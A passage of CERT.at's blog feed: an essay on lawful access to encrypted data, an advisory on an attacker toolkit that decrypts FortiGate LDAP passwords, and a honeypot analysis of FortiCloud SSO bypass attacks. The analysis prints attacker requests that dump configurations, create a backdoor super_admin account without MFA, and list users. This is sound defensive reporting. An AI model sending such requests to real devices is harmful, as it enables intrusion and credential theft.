&lt;p&gt;&amp;nbsp;&lt;/p&gt;</description><pubDate>Wed, 18 Feb 2026 19:04:18 GMT+0100</pubDate><guid>https://www.cert.at/en/blog/2026/2/lawful-access-to-encrypted-data-general-considerations</guid><dc:creator>CERT.at</dc:creator><dc:date>2026-02-18T19:04:18Z</dc:date></item><item><title>Lawful access to encrypted data: why is this so hard to do?</title><link>https://www.cert.at/en/blog/2026/2/lawful-access-to-encrypted-data-why-is-this-so-hard-to-do</link><description>&lt;p&gt;This blogpost is part of a series of articles on this topic. I will thus not do a full intro here, for the background see&lt;/p&gt;&#13;
&lt;ul&gt;&#13;
&lt;li&gt;&lt;a href=&quot;https://www.cert.at/de/blog/2017/8/blog-20170731130131-2076&quot;&gt; Ein paar Thesen zu aktuellen Gesetzesentw&amp;uuml;rfen &lt;/a&gt;&lt;/li&gt;&#13;
&lt;li&gt;&lt;a href=&quot;https://www.cert.at/de/blog/2024/9/ein-paar-gedanken-zur-uberwachung-verschlusselter-nachrichten&quot;&gt; Ein paar Gedanken zur &amp;bdquo;&amp;Uuml;berwachung verschl&amp;uuml;sselter Nachrichten&amp;ldquo; &lt;/a&gt;&lt;/li&gt;&#13;
&lt;li&gt;&lt;a href=&quot;https://www.cert.at/en/blog/2025/2/chat-control-vs-file-sharing&quot;&gt;Chat Control vs. File Sharing&lt;/a&gt;&lt;/li&gt;&#13;
&lt;li&gt;&lt;a href=&quot;https://www.cert.at/en/blog/2025/7/encryption-vs-lawful-interception-eu-policy-news&quot;&gt; Encryption vs. Lawful Interception: EU policy news &lt;/a&gt;&lt;/li&gt;&#13;
&lt;li&gt;&lt;a href=&quot;https://www.cert.at/en/blog/2025/10/hlg-paper-review&quot;&gt; A review of the &amp;ldquo;Concluding report of the High-Level Group on access to data for effective law enforcement&amp;rdquo; &lt;/a&gt;&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;p&gt;As I am now a member of the&amp;nbsp;&lt;a href=&quot;https://ec.europa.eu/transparency/expert-groups-register/screen/expert-groups/consult?lang=en&amp;amp;groupID=4005&quot;&gt; EU expert group &lt;/a&gt; which is tasked with coming up with a solution, I have been thinking a lot about this problem.&lt;/p&gt;&#13;
&lt;p&gt;An interesting train of thought turned out to be the question &amp;ldquo;We managed to give Law Enforcement (LE) wiretapping powers in old-style phone networks, but not in modern, Internet-based communication services. Why?&amp;rdquo;&lt;/p&gt;&#13;
&lt;p&gt;I came up with the following reasons:&lt;/p&gt;&#13;
&lt;h2 class=&quot;block&quot;&gt;Location / Jurisdiction&lt;/h2&gt;&#13;
&lt;p&gt;50 years ago, phone systems were real physical things. There were copper wires running to houses and they connected two pretty static entities: the telephony exchange and the phone jack in your home. Neither side moved. The cable didn&amp;rsquo;t move either. Both sides were in the same jurisdiction.&lt;/p&gt;&#13;
&lt;p&gt;A court order to tap a phone line was thus simple. For example: a court in Vienna might have ordered the Austrian PTT to tap my phone line in Vienna and give the Viennese police access. Everything is local. Everything is in the same jurisdiction.&lt;/p&gt;&#13;
&lt;p&gt;Over the top (OTT) services like WhatsApp or Signal are completely different. As long as all parties have Internet connectivity, the technology of OTTs doesn&amp;rsquo;t care about geography. More often than not, the OTT operator is in a different country than its users.&lt;/p&gt;&#13;
&lt;h2&gt;Basic internet design&lt;/h2&gt;&#13;
&lt;p&gt;In the old phone network design (and what ISDN tried to bring to the data world), the network provided the service that the end-users wanted. The switches knew that they were transporting audio calls. SMS as a communication tool is also directly a service by the network.&lt;/p&gt;&#13;
&lt;p&gt;The Internet turned this around: the network itself, the ISPs and the routers that are making up the network, are just very efficient and fast, but rather dumb packet forwarding systems. In theory, they need no knowledge at all about applications that run over the Internet (except for some valid performance optimizations and the &lt;a href=&quot;https://en.wikipedia.org/wiki/IP_Multimedia_Subsystem&quot;&gt;wet dreams of product managers&lt;/a&gt; ).&lt;/p&gt;&#13;
&lt;p&gt;The mantra is now: &lt;strong&gt;Dumb core, intelligence at the edge.&lt;/strong&gt;&lt;/p&gt;&#13;
&lt;p&gt;All the innovation that was unleashed by the Internet comes from this basic idea: Innovations do not happen in the core &amp;ndash; where upgrading all devices to support a new application would be slow, but on the side of the devices attached to the network. Tim Berners-Lee didn&amp;rsquo;t have to get protocol support from routers to start the Web. The end-to-end principle, in combination with the DNS as a generic rendezvous-protocol was enough.&lt;/p&gt;&#13;
&lt;p&gt;The implication for wiretapping is: The ISP might be able to provide raw network data (pcap), but not decoded application-level information.&lt;/p&gt;&#13;
&lt;p&gt;Signal and others went a step further: they moved from &amp;ldquo;end-to-end&amp;rdquo; communication to &amp;ldquo;end-to-end encrypted (E2EE)&amp;rdquo; communication. What does that mean?&lt;/p&gt;&#13;
&lt;p&gt;Simple chat systems (e.g. IRC, ICQ, Mattermost, &amp;hellip;) utilize a central node that receives messages and passes them on to the right client. Modern systems like Signal reduce the central node to the bare minimum of store&amp;amp;forward of opaque data packets. &lt;strong&gt;All the security properties are in the client, not the central server.&lt;/strong&gt; Adding a new device to your account? Another client needs to provide the cryptographic material; the central node does not have the ability.&lt;/p&gt;&#13;
&lt;p&gt;Forcing the central node to cooperate with LE thus will not get you any readable content.&lt;/p&gt;&#13;
&lt;h2&gt;Services vs. Products&lt;/h2&gt;&#13;
&lt;p&gt;I&amp;rsquo;ve written about this before in &lt;a href=&quot;https://www.cert.at/en/blog/2025/2/chat-control-vs-file-sharing&quot;&gt;Chat Control vs. File Sharing&lt;/a&gt; .&lt;/p&gt;&#13;
&lt;p&gt;Quick summary: A service gives the law a clear target for regulation and LE a clear contact point for enforcement. But sometimes, a communication network doesn&amp;rsquo;t need that. Examples are e-mail, the fediverse or Matrix: you can run your own server and then interconnect with all the other servers. There no longer a single entity to target for wiretapping.&lt;/p&gt;&#13;
&lt;p&gt;Peer-to-peer networking would be the next obvious evolutionary step.&lt;/p&gt;&#13;
&lt;h2&gt;Open vs. Closed Source Software&lt;/h2&gt;&#13;
&lt;p&gt;Both server and client software can be either proprietary software or open source, which leads to interesting consequences for LE access:&lt;/p&gt;&#13;
&lt;h3&gt;Closed source:&lt;/h3&gt;&#13;
&lt;ul&gt;&#13;
&lt;li&gt;The law can require certain features and can enforce their presence&lt;/li&gt;&#13;
&lt;li&gt;That is, if the company behind it is within the jurisdiction&lt;/li&gt;&#13;
&lt;li&gt;The EU just opened App-stores to break monopolies, making enforcement harder to do&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;h3&gt;Open source:&lt;/h3&gt;&#13;
&lt;ul&gt;&#13;
&lt;li&gt;It&amp;rsquo;s hard to hide a LEA key-escrow / interface in Open Source Software.&lt;/li&gt;&#13;
&lt;li&gt;It&amp;rsquo;s trivial to recompile the code without those features (and someone in a different jurisdiction will for sure)&lt;/li&gt;&#13;
&lt;li&gt;So how do you enforce that people only run server/clients with the LE access feature? Monitor and penalise? (e.g. like driving a car without license plates)&lt;/li&gt;&#13;
&lt;li&gt;Will this lead a regime of government-licensed communication software?&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;h2&gt;Number of services&lt;/h2&gt;&#13;
&lt;p&gt;We&amp;rsquo;re not in a world of very few communication enablers anymore, there are no more telephony monopolies. There might be 3 to 4 mobile operators per country, but the VoIP space already exploded years ago.&lt;/p&gt;&#13;
&lt;p&gt;But OTT is next level: Every OTT service can have customers round the globe, and every user can select any of the many global OTT operators.&lt;/p&gt;&#13;
&lt;p&gt;The hurdle to establish an OTT is very low, too: The availability of Open Source implementations means everybody can just download the code, install if on-premise or in the cloud and have a running communication service a few minutes later. Anyone who is running Nextcloud to host their own files needs just a few clicks to enable &lt;a href=&quot;https://nextcloud.com/talk/&quot;&gt;Nextcloud Talk&lt;/a&gt; . You don&amp;rsquo;t need to license spectrum; you don&amp;rsquo;t need to get regulatory approval. Just do it.&lt;/p&gt;&#13;
&lt;p&gt;Communication (maybe not E2EE) is baked into many applications these days: most multi-user games have a chat feature, Web forums do it, social media platforms usually include one and even Spotify recently launched a chat feature.&lt;/p&gt;&#13;
&lt;p&gt;Basically: the number of services with which LE needs to deal with went up by multiple orders of magnitude.&lt;/p&gt;&#13;
&lt;h2&gt;The Laws of Mathematics beat the Laws of Humans&lt;/h2&gt;&#13;
&lt;p&gt;In the physical world, &amp;ldquo;monopoly on violence&amp;rdquo; by the state can break whatever barrier citizens can erect for their physical protection. There is no safe that the police can&amp;rsquo;t open. There is no house where the police can&amp;rsquo;t force their way in.&lt;/p&gt;&#13;
&lt;p&gt;This is not true for IT systems that use modern cryptography. The &amp;ldquo;use overwhelming force&amp;rdquo;-card cannot be played to break open an encrypted disk.&lt;/p&gt;&#13;
&lt;h2&gt;Blast Radius&lt;/h2&gt;&#13;
&lt;p&gt;Law enforcement agencies are full of humans. They make mistakes. They sometimes abuse their power. The technical systems that implement the lawful access are built by humans and will have their share of problems. (see also &lt;a href=&quot;https://en.wikipedia.org/wiki/Salt_Typhoon&quot;&gt;Salt Typhoon and US telecoms&lt;/a&gt; )&lt;/p&gt;&#13;
&lt;p&gt;We need to think about the damage that will happen when (not if) the system fails.&lt;/p&gt;&#13;
&lt;p&gt;Old-style legal interceptions on phone networks are limited. If the police in some SE Asian country goes overboard in their wiretaps, that will not affect me here in Austria.&lt;/p&gt;&#13;
&lt;p&gt;But with OTTs? If said police can convince an OTT service (either centrally or via the clients) to forward cleartext to them, any mistakes on their side can affect my privacy.&lt;/p&gt;&#13;
&lt;p&gt;Or, if we build a special forensics interface into the secure elements of mobile phone, then the authentication/authorization built into that interface is now part of my own attack surface. Any key leak or vulnerability there instantly destroys the security of millions of devices worldwide.&lt;/p&gt;&#13;
&lt;p&gt;This is a bit like digital rights management (DRM) or content protection schemes. Remember DVD/CSS? It was a global standard that tried to ensure that only authorized devices could access the unencrypted content of the disks. But &lt;a href=&quot;https://en.wikipedia.org/wiki/DeCSS&quot;&gt;once someone recovered the key from a video-player&lt;/a&gt; , the game was up: every disk word-wide could be decrypted by everybody.&lt;/p&gt;&#13;
&lt;p&gt;Thus: the maximum damage that can occur by one single mistake can be much larger now than in previous legal interception cases.&lt;/p&gt;&#13;
&lt;h2&gt;Conclusion&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot;&gt;There will not be a simple access solution that doesn't include significant downsides. The &lt;a href=&quot;https://www.cert.at/en/blog/2026/2/lawful-access-to-encrypted-data-general-considerations&quot;&gt;next article in this series&lt;/a&gt; covers some of the things one has to consider when selecting an approach to lawful access to encrypted data.&lt;/p&gt;</description><pubDate>Thu, 12 Feb 2026 17:48:27 GMT+0100</pubDate><guid>https://www.cert.at/en/blog/2026/2/lawful-access-to-encrypted-data-why-is-this-so-hard-to-do</guid><dc:creator>CERT.at</dc:creator><dc:date>2026-02-12T17:48:27Z</dc:date></item><item><title>Threat actors use FortiCloud SSO bypass to collect LDAP connection passwords</title><link>https://www.cert.at/en/blog/2026/1/threat-actors-use-forticloud-to-collect-ldap-connection-passwords</link><description>&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;&lt;strong&gt;CERT.at gained access to a toolkit of an unknown threat actor targeting FortiCloud SSO bypass in Fortinet appliances (CVE-2025-59718/CVE-2025-59719). We are releasing under TLP:CLEAR key findings about likely post-exploitation goals of the attacker.&lt;/strong&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;The obtained exploit works only for the original vulnerability [1] and is not effective against patched devices. It is, however, known that the flaw still exists and affects all SSO setups in Fortinet appliances [2]. The exploit behavior is consistent with our &lt;a href=&quot;https://www.cert.at/en/blog/2026/1/look-at-forticloud-sso-bypass-exploitation&quot;&gt;previous publication&lt;/a&gt;.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;The exploit is prepared to work against FortiGate instances, and in the toolkit, we have found two scripts for the post-exploitation analysis of the collected configuration dumps. The attacker:&lt;/p&gt;&#13;
&lt;ul&gt;&#13;
&lt;li class=&quot;block&quot;&gt;looks for the LDAP/AD configuration settings,&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;is in the possession of the default FortiGate configuration encryption key.&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;The &amp;ldquo;regular bind&amp;ldquo; mode of LDAP/AD connection with FortiGate requires providing user credentials for the appliance [3], which FortiGate uses to establish a connection with the LDAP server. They are encrypted in the configuration, but by default, the encryption key is static and the same on all instances. We were able to confirm that the key included in the attacker toolkit works on the fresh FortiGate 7.6.5 VM.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;&lt;strong&gt;Note:&lt;/strong&gt; in our tests, we also confirmed that the normal local user passwords are NOT possible to retrieve back. Our understanding is that only the data that is necessary to become back (LDAP connection password for regular bind, private keys for certificates, etc.) could be decrypted.&lt;/p&gt;&#13;
&lt;h1 class=&quot;block&quot;&gt;Preventive recommendations&lt;/h1&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;We strongly recommend activating the &amp;ldquo;private data encryption&amp;rdquo; feature [4] in FortiGate devices, which replaces the default encryption key. This step is also officially recommended by Fortinet as a hardening measure [5]. The encryption key has to be the same in all instances in an HA cluster. Using a custom encryption key helps &amp;ldquo;buying time&amp;rdquo; for credential rotation after a configuration leak.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;As always, CERT.at strongly recommends keeping management interfaces not accessible from the public internet. In the last blog post, the Fortinet PSIRT recommends setting a local-in policy to restrict access on the administrative interface [6].&lt;/p&gt;&#13;
&lt;h2 class=&quot;block&quot;&gt;References&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot;&gt;[1] &lt;a href=&quot;https://fortiguard.fortinet.com/psirt/FG-IR-25-647&quot;&gt;https://fortiguard.fortinet.com/psirt/FG-IR-25-647&amp;nbsp;&lt;/a&gt;&lt;br /&gt;[2] &lt;a href=&quot;https://www.fortinet.com/blog/psirt-blogs/analysis-of-sso-abuse-on-fortios&quot;&gt;https://www.fortinet.com/blog/psirt-blogs/analysis-of-sso-abuse-on-fortios&lt;/a&gt;&lt;br /&gt;[3] &lt;a href=&quot;https://docs.fortinet.com/document/fortigate/7.6.0/administration-guide/102264/configuring-an-ldap-server&quot;&gt;https://docs.fortinet.com/document/fortigate/7.6.0/administration-guide/102264/configuring-an-ldap-server&lt;/a&gt;&lt;br /&gt;[4] &lt;a href=&quot;https://community.fortinet.com/t5/FortiGate/Technical-Tip-How-to-enable-private-data-encryption-feature-on-a/ta-p/339071&quot;&gt;https://community.fortinet.com/t5/FortiGate/Technical-Tip-How-to-enable-private-data-encryption-feature-on-a/ta-p/339071&lt;br /&gt;&lt;/a&gt;[5] &lt;a href=&quot;https://docs.fortinet.com/document/fortigate/7.6.0/best-practices/555436/hardening#SecurePassStorage&quot;&gt;https://docs.fortinet.com/document/fortigate/7.6.0/best-practices/555436/hardening#SecurePassStorage&lt;/a&gt;&lt;br /&gt;[6] &lt;a href=&quot;https://docs.fortinet.com/document/fortigate/7.6.4/administration-guide/363127/local-in-policy&quot;&gt;https://docs.fortinet.com/document/fortigate/7.6.4/administration-guide/363127/local-in-policy&lt;/a&gt;&lt;/p&gt;</description><pubDate>Tue, 27 Jan 2026 17:16:28 GMT+0100</pubDate><guid>https://www.cert.at/en/blog/2026/1/threat-actors-use-forticloud-to-collect-ldap-connection-passwords</guid><dc:creator>CERT.at</dc:creator><dc:date>2026-01-27T17:16:28Z</dc:date></item><item><title>Look at FortiCloud SSO Bypass Exploitation (CVE-2025-59718/59719)</title><link>https://www.cert.at/en/blog/2026/1/look-at-forticloud-sso-bypass-exploitation</link><description>&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;&lt;strong&gt;In December last year, Fortinet disclosed [1] a vulnerability in SAML processing, which allowed full bypass of authentication to management interfaces with FortiCloud SSO enabled. According to new, still not officially confirmed reports, the vulnerability may not have been fully patched [10]. As affected devices are represented in my small high-interactive honeypots network, we have an opportunity to take a look at what the attackers do.&lt;/strong&gt;&lt;/p&gt;&#13;
&lt;blockquote&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;&lt;strong&gt;Update:&amp;nbsp;&lt;/strong&gt;In the meantime, Fortinet has &lt;a href=&quot;https://www.fortinet.com/blog/psirt-blogs/analysis-of-sso-abuse-on-fortios&quot;&gt;officially confirmed&lt;/a&gt; that the vulnerability was not fully patched, and also setups with other SAML SSO Identity Providers are vulnerable.&amp;nbsp;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;&lt;strong&gt;Update 2:&amp;nbsp;&lt;/strong&gt;Fortinet has clarified in updates to the previously linked publications and the&amp;nbsp;&lt;a href=&quot;https://www.fortiguard.com/psirt/FG-IR-26-060&quot;&gt;new advisory&lt;/a&gt;, that the newest wave of attacks was caused by a separated vulnerability in FortiCloud SSO integration. After investigation, they have also concluded that setups with other SSO Identity Providers are&amp;nbsp;&lt;strong&gt;not&amp;nbsp;&lt;/strong&gt;vulnerable.&lt;/p&gt;&#13;
&lt;/blockquote&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;First reports about the exploitation surfaced on the 12th of December, when it was reported by two security companies [2, 5]. Specifically, ArcticWolf reported observation of attackers exporting configuration backups. A few days later, following a question about that from my colleague, I looked into my honeypot logs and was able to immediately spot some suspicious requests to &amp;ldquo;/remote/saml/login&amp;rdquo;, but the feature wasn&amp;rsquo;t active on my devices. If you read the post from VulnCheck [3], you already know the spoiler &amp;ndash; this was not the valid exploit.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;I decided to give it a try, and on 19th December, I activated the FortiCloud SSO and waited. Meanwhile, I spotted multiple attempts to detect enabled FortiCloud SSO. They were similar to publicly available checks [6], but a different one than used later by VulnCheck: my logs showed special requests directly targeting the FortiCloud SSO feature, while VulnCheck looked for the presence of a FortiCloud SSO login button. Both ideas are good, and using crafted requests may have a goal of lowering hits on honeypots.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;Based on the techniques and the post-exploitation activity, I grouped the attacks into a few campaigns, but it does not mean that they all are actually performed by different threat actors. In later attempts, actions originally performed separately started to be executed together (e.g., campaigns 1, 2 and 3 were later combined in one user session).&lt;/p&gt;&#13;
&lt;h2 class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;Campaign Zero&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;The group &amp;ldquo;zero&amp;rdquo; consists of requests from known &amp;ldquo;PoC&amp;rdquo; scripts [7]. As already stated, they seem to be invalid &amp;ndash; in the case of my machines, they are ignored and treated as any other non-existing URL (this does not necessarily mean returning HTTP 404 in case of FortiGate). The confirmation that this is not the right exploit came around 10 pm at 2025-12-19, when my FortiGate instance got hacked the first time using a significantly different request.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;The Campaign Zero appears to be active until the end of December.&lt;/p&gt;&#13;
&lt;h2 class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;First Campaign&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;It is important to note the first real exploit originated from an IP that previously checked if FortiCloud SSO was enabled. It used crafted requests, though a bit different from those available in GitHub [6]. The exploitation behavior seems similar to the behavior described by ArcticWolf, and the successful login bypass generates a log entry like:&lt;/p&gt;&#13;
&lt;blockquote&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;eventtime=[REDACTED] tz=&quot;+0100&quot; logid=&quot;xx&quot; type=&quot;event&quot; subtype=&quot;system&quot; level=&quot;information&quot; vd=&quot;root&quot; logdesc=&quot;Admin login successful&quot; sn=&quot;[REDACTED]&quot; user=&quot;admin&quot; ui=&quot;sso([REDACTED])&quot; method=&quot;sso&quot; srcip=[REDACTED] dstip=[REDACTED] action=&quot;login&quot; status=&quot;success&quot; reason=&quot;none&quot; profile=&quot;super_admin&quot; msg=&quot;&lt;strong&gt;Administrator admin logged in successfully from sso&lt;/strong&gt;([REDACTED])&quot;&lt;/p&gt;&#13;
&lt;/blockquote&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;Such a log is issued on every successful exploitation of the flaw. Following the login, the attacker performed exactly one request attempting to dump the configuration:&lt;/p&gt;&#13;
&lt;blockquote&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;GET /api/v2/monitor/system/config/backup?destination=file&amp;amp;file_format=fos&amp;amp;scope=global&lt;/p&gt;&#13;
&lt;/blockquote&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;However, something did not go well: my FortiGate responded with HTTP 405 saying that the HTTP method is not allowed. This is a bit surprising because this path is widely used to download backups, and even the official library uses these kinds of GET requests [8, 9]. Unfortunately, the full REST API documentation is not publicly available. Some older docs and scripts suggest that the provided parameter values may not be correct, but I rather suspect targeting a specific FortiOS version, which is not present in my setup. The response to such a request does not contain the full configuration:&lt;/p&gt;&#13;
&lt;blockquote&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;{&quot;path&quot;:&quot;system&quot;,&quot;name&quot;:&quot;config&quot;,&quot;action&quot;:&quot;backup&quot;,&quot;serial&quot;:&quot;[REDACTED]&quot;,&quot;version&quot;:&quot;v7.x.x&quot;,&quot;build&quot;:[REDACTED],&quot;status&quot;:&quot;error&quot;,&quot;http_status&quot;:405}&lt;/p&gt;&#13;
&lt;/blockquote&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;These attacks, in the pattern &amp;ldquo;exploit-dump-fail,&amp;rdquo; repeat regularly since activating the FortiCloud login. Additionally, these attacks did not target FortiGate exclusively, but also FortiWeb, where this API path does not exist at all. While it seems similar to Artic Wolf&amp;rsquo;s report, failed backup attempts do not cause FortiOS to emit any log, and &amp;ndash; as shown above &amp;ndash; do not result in a configuration dump in my environment.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;The first campaign is the most present in my logs, with multiple exploit attempts a day.&lt;/p&gt;&#13;
&lt;h2 class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;Second campaign&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;The next day, I observed another exploitation of the FortiGate machine. This time the execution followed strictly the procedure from the Arctic Wolf post: after bypassing the login, a proper request was used to create a configuration dump. The request looks like (headers omitted):&lt;/p&gt;&#13;
&lt;blockquote&gt;&#13;
&lt;p class=&quot;block&quot;&gt;POST /api/v2/monitor/system/config/backup&lt;br /&gt;{&quot;destination&quot;:&quot;file&quot;,&quot;file_format&quot;:&quot;fos&quot;,&quot;scope&quot;:&quot;global&quot;}&lt;/p&gt;&#13;
&lt;/blockquote&gt;&#13;
&lt;p class=&quot;block&quot;&gt;In response, a full configuration dump is returned. It also issues log entries like:&lt;/p&gt;&#13;
&lt;blockquote&gt;&#13;
&lt;p class=&quot;block&quot;&gt;eventtime=[REDACTED] tz=&quot;+0100&quot; logid=&quot;[REDACTED]&quot; type=&quot;event&quot; subtype=&quot;system&quot; level=&quot;warning&quot; vd=&quot;root&quot; logdesc=&quot;Admin performed an action from GUI&quot; user=&quot;admin&quot; ui=&quot;GUI([REDACTED])&quot; action=&quot;download&quot; status=&quot;success&quot; msg=&quot;&lt;strong&gt;System config file has been downloaded by user admin via GUI&lt;/strong&gt;([REDACTED])&quot;&lt;/p&gt;&#13;
&lt;/blockquote&gt;&#13;
&lt;h2 class=&quot;block&quot;&gt;Third campaign&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;The next day, I registered another successful exploitation attempt; this time the access was used to perform a single configuration change request: a new user with administrative privileges was created. The request looks like:&lt;/p&gt;&#13;
&lt;blockquote&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;POST /api/v2/cmdb/system/admin?vdom=root&lt;br /&gt;&lt;strong&gt;{&quot;name&quot;: &quot;root_admin&quot;,&lt;/strong&gt; &quot;wildcard&quot;: &quot;disable&quot;, &quot;remote-auth&quot;: &quot;disable&quot;, &quot;remote-group&quot;: &quot;&quot;, &quot;peer-auth&quot;: &quot;disable&quot;, &quot;peer-group&quot;: &quot;&quot;, &quot;trusthost1&quot;: &quot;0.0.0.0/0&quot;, &quot;trusthost2&quot;: &quot;0.0.0.0/0&quot;, &quot;trusthost3&quot;: &quot;0.0.0.0/0&quot;, &quot;trusthost4&quot;: &quot;0.0.0.0/0&quot;, &quot;trusthost5&quot;: &quot;0.0.0.0/0&quot;, &quot;trusthost6&quot;: &quot;0.0.0.0/0&quot;, &quot;trusthost7&quot;: &quot;0.0.0.0/0&quot;, &quot;trusthost8&quot;: &quot;0.0.0.0/0&quot;, &quot;trusthost9&quot;: &quot;0.0.0.0/0&quot;, &quot;trusthost10&quot;: &quot;0.0.0.0/0&quot;, &quot;ip6-trusthost1&quot;: &quot;::/0&quot;, &quot;ip6-trusthost2&quot;: &quot;::/0&quot;, &quot;ip6-trusthost3&quot;: &quot;::/0&quot;, &quot;ip6-trusthost4&quot;: &quot;::/0&quot;, &quot;ip6-trusthost5&quot;: &quot;::/0&quot;, &quot;ip6-trusthost6&quot;: &quot;::/0&quot;, &quot;ip6-trusthost7&quot;: &quot;::/0&quot;, &quot;ip6-trusthost8&quot;: &quot;::/0&quot;, &quot;ip6-trusthost9&quot;: &quot;::/0&quot;, &quot;ip6-trusthost10&quot;: &quot;::/0&quot;, &quot;accprofile&quot;: {&quot;q_origin_key&quot;: &quot;super_admin&quot;}, &quot;allow-remove-admin-session&quot;: &quot;enable&quot;, &quot;comments&quot;: &quot;&quot;, &quot;vdom&quot;: [{&quot;name&quot;: &quot;root&quot;}], &quot;schedule&quot;: &quot;&quot;, &quot;accprofile-override&quot;: &quot;disable&quot;, &quot;radius-vdom-override&quot;: &quot;disable&quot;, &quot;password-expire&quot;: &quot;0000-00-00 00:00:00&quot;, &quot;force-password-change&quot;: &quot;disable&quot;, &quot;two-factor&quot;: &quot;disable&quot;, &quot;two-factor-authentication&quot;: &quot;&quot;, &quot;two-factor-notification&quot;: &quot;&quot;, &quot;fortitoken&quot;: &quot;&quot;, &quot;email-to&quot;: &quot;&quot;, &quot;sms-server&quot;: &quot;fortiguard&quot;, &quot;sms-custom-server&quot;: &quot;&quot;, &quot;sms-phone&quot;: &quot;&quot;, &quot;guest-auth&quot;: &quot;disable&quot;, &quot;guest-usergroups&quot;: [], &quot;guest-lang&quot;: &quot;&quot;, &quot;password&quot;: &quot;[REDACTED]&quot;}&lt;/p&gt;&#13;
&lt;/blockquote&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;This gives the highest possible permissions, without requiring any MFA method or restricting network access. Additionally, the provided password was very easy to brute force. This action causes a log entry like:&lt;/p&gt;&#13;
&lt;blockquote&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;eventtime=[REDACTED] tz=&quot;+0100&quot; logid=&quot;[REDACTED]&quot; type=&quot;event&quot; subtype=&quot;system&quot; level=&quot;information&quot; vd=&quot;root&quot; logdesc=&quot;Object attribute configured&quot; user=&quot;admin&quot; ui=&quot;GUI([REDACTED])&quot; action=&quot;Add&quot; cfgtid=[REDACTED] cfgpath=&quot;system.admin&quot; cfgobj=&quot;root_admin&quot; cfgattr=&quot;old-password[*]accprofile[super_admin]vdom[root]password[*]&quot; msg=&quot;&lt;strong&gt;Add system.admin root_admin&lt;/strong&gt;&quot;&lt;/p&gt;&#13;
&lt;/blockquote&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;Creating new admin accounts is also consistent with the newest report from Arctic Wolf [12].&lt;/p&gt;&#13;
&lt;h2 class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;Fourth campaign&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;Another day later, the authentication bypass was used to log in and collect device&amp;rsquo;s configuration. This time, instead of an API request, the built-in WebSocket-based terminal feature in the GUI was used. The attacker executed just four commands:&lt;/p&gt;&#13;
&lt;ul&gt;&#13;
&lt;li class=&quot;block&quot;&gt;&lt;code&gt;config system console&lt;/code&gt;&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;&lt;code&gt;set output standard&lt;/code&gt;&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;&lt;code&gt;show full-configuration user local&lt;/code&gt;&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;&lt;code&gt;show system ha&lt;/code&gt;&lt;code&gt;&lt;/code&gt;&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;The second command changes how the data are shown, preventing using pagination &amp;ndash; this makes automated processing easier. The last two commands were used to collect the configuration, but instead of the full dump, only specific information about local users and high availability settings was collected. In later attempts, I observed the execution of&amp;nbsp;&lt;code&gt;show full-configuration&lt;/code&gt; as well, and the web console access was also used successfully on a FortiWeb instance.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Related log entries are:&lt;/p&gt;&#13;
&lt;blockquote&gt;&#13;
